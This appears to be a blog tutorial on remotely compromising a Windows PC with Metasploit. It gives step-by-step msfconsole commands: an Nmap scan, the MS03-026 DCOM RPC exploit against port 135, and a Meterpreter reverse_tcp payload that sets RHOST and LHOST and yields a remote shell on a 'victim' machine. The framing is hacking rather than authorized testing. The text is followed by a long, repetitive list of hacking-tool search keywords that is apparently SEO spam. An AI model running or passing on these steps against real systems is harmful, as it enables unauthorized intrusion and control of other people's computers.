HOW TO HACK A PC REMOTELY WITH METASPLOIT?

Metasploit is an advanced hacking tool that comes itself with a complete lack of advanced penetration testing tools. Penetration testers and hackers are taking so much advantage of this tool. It's a complete hack pack for a hacker that he can play almost any attack with it. I am not covering attacks in this article but I am going to share about how to hack a PC remotely with Metasploit. It's not so complicated if you pay attention to. It just needs a better understanding of each step you're performing. Let's move on how to do it.

SO, HOW TO HACK A PC REMOTELY WITH METASPLOIT?

REQUIREMENTS

Before getting started, make sure you have all the following things required to hack a PC remotely with Metasploit.
  • Linux Machine (Kali Linux or BackTrack 5)
  • Metasploit (Built in the mentioned Linux OS)
  • Windows PC victim

STEPS TO FOLLOW

Let's move on how to perform the complete attack.
  • Start your Linux OS and open up Nmap and run a scan for your victim remote server. Like we have our victim on remote server 192.168.42.129. It will show up the range of all open ports of the victim machine as you can see below.
  • We can see the open port here is 135. So, now we go to Metasploit and try to exploit and gain access to it. To open up, navigate to Application > BackTrack > Exploitation Tools > Network Exploitation Tools > Metasploit Framework > msfconsole.
  • After the initialization of msfconsole, standard checks, we will see the window like below.
  • Now, as we already know that our port 135 is open so, we search for a related RPC exploit in Metasploit. You can check out all the exploit list supported by Metasploit by using command 'show exploits'.
  • Now to activate an exploit, type the "use " with the exploit name like "use exploit/windows/dcerpc/ms03_026_dcom".
  • As we're in our required exploit environment, we need to configure the exploit according to our scenario. To check out the list of all the available options of an exploit, we can use command "show options". As we already know about the open port RPORT is 135. So, we just need to set our RHOST which we can set simply using the "set RHOST" command. Just type "set RHOST 192.168.42.129" and it's done.
  • Now before we launch the exploit is setting the payload for the exploit. We can view all the available payloads using the "show payloads" command.
  • Every payload can be used for a different scenario. In our case, we are using the reverse TCP meterpreter which can be set using the command, "set PAYLOAD windows/meterpreter/reverse_tcp" for remote shell and then use "show options" command to view the options for it.
  • Here we notice LHOST for out payload is not set, so we set it out to our Public IP i.e. 192.168.42.128 using the command "set LHOST 192.168.42.128".
  • Now exploit is configured and ready to launch. Now simply use "exploit" command to launch the attack. If exploit is executed successfully, we will see the message like below.
  • Now that a reverse connection has been set up between the victim and our machine, we have complete control of the server.  To find out all the commands to play with the victim machine, we can use the "help".

We have successfully gained access to a remote PC with Metasploit. That's all how to hack a PC remotely with Metasploit. Hope it will work for you.
More info
  1. Hacking Tools Pc
  2. Pentest Tools Download
  3. New Hack Tools
  4. Hack Tools For Games
  5. Top Pentest Tools
  6. Hacking Apps
  7. Hack Tools For Games
  8. Pentest Tools Apk
  9. Hacking Tools Windows 10
  10. Hacker Security Tools
  11. Hacker Tools For Pc
  12. Kik Hack Tools
  13. Hacker Tools For Mac
  14. New Hack Tools
  15. Tools 4 Hack
  16. Best Hacking Tools 2020
  17. Black Hat Hacker Tools
  18. New Hacker Tools
  19. Best Pentesting Tools 2018
  20. Bluetooth Hacking Tools Kali
  21. Hack Tool Apk
  22. Hacking Tools Usb
  23. Hacker Tools
  24. Hack And Tools
  25. Hack App
  26. Hacking Tools For Beginners
  27. Pentest Tools Linux
  28. Pentest Tools Nmap
  29. Hacker Tools Hardware
  30. Game Hacking
  31. Pentest Tools Bluekeep
  32. Pentest Tools Url Fuzzer
  33. Hackrf Tools
  34. Physical Pentest Tools
  35. Tools For Hacker
  36. Pentest Tools Bluekeep
  37. Hacking Tools For Windows 7
  38. Hacking App
  39. Hacker Tools For Mac
  40. Pentest Tools Linux
  41. Hacking Tools For Windows 7
  42. Hacker Tools Windows
  43. Pentest Tools Android
  44. Nsa Hack Tools Download
  45. Hack Tools Github
  46. Hacker Tools Hardware
  47. Hacking Tools For Windows 7
  48. Pentest Tools Tcp Port Scanner
  49. Hacking Tools Kit
  50. Pentest Tools Website Vulnerability
  51. Pentest Tools Linux
  52. Hacker Tools List
  53. Hacker Tools For Ios
  54. Hacker Tools 2019
  55. Pentest Tools For Windows
  56. How To Hack
  57. Hacking Tools And Software
  58. Usb Pentest Tools
  59. Hacker Tools 2020
  60. Nsa Hack Tools Download
  61. Physical Pentest Tools
  62. Hacker Security Tools
  63. Hack Tool Apk No Root
  64. Pentest Tools Windows
  65. Pentest Tools Framework
  66. Hacking Tools For Mac
  67. Hacking Tools 2020
  68. Hacker Tools Mac
  69. Hack And Tools
  70. Hacking Tools For Mac
  71. How To Make Hacking Tools
  72. Hacker Tools 2019
  73. Hack Tools
  74. Hacker Hardware Tools
  75. Game Hacking
  76. Hacking Tools
  77. Hacking Tools For Pc
  78. New Hack Tools
  79. Hack Tools Download
  80. Usb Pentest Tools
  81. Hacker Tools For Windows
  82. Hacker Security Tools
  83. Hacking Tools Windows 10
  84. New Hacker Tools
  85. Install Pentest Tools Ubuntu
  86. Pentest Tools Website
  87. Usb Pentest Tools
  88. Nsa Hack Tools Download
  89. Usb Pentest Tools
  90. Hack And Tools
  91. Hacker Tools Linux
  92. Hacker Tools Github
  93. Pentest Tools Find Subdomains
  94. Hacking Tools Windows
  95. Pentest Tools For Ubuntu
  96. Kik Hack Tools
  97. Hacking Tools Online
  98. Termux Hacking Tools 2019
  99. Hack Tools 2019
  100. Kik Hack Tools
  101. Easy Hack Tools
  102. Computer Hacker
  103. Top Pentest Tools
  104. Pentest Automation Tools
  105. Hack Tools Pc
  106. Pentest Tools Alternative
  107. Hacker Tools Software
  108. Computer Hacker
  109. Pentest Tools Framework
  110. Pentest Reporting Tools
  111. Hack Tools Download
  112. Hacking Tools Hardware
  113. Hack Tools 2019
  114. Hack Tools For Windows
  115. Hack Tools Download
  116. Hack Tools For Mac

No comments:

Post a Comment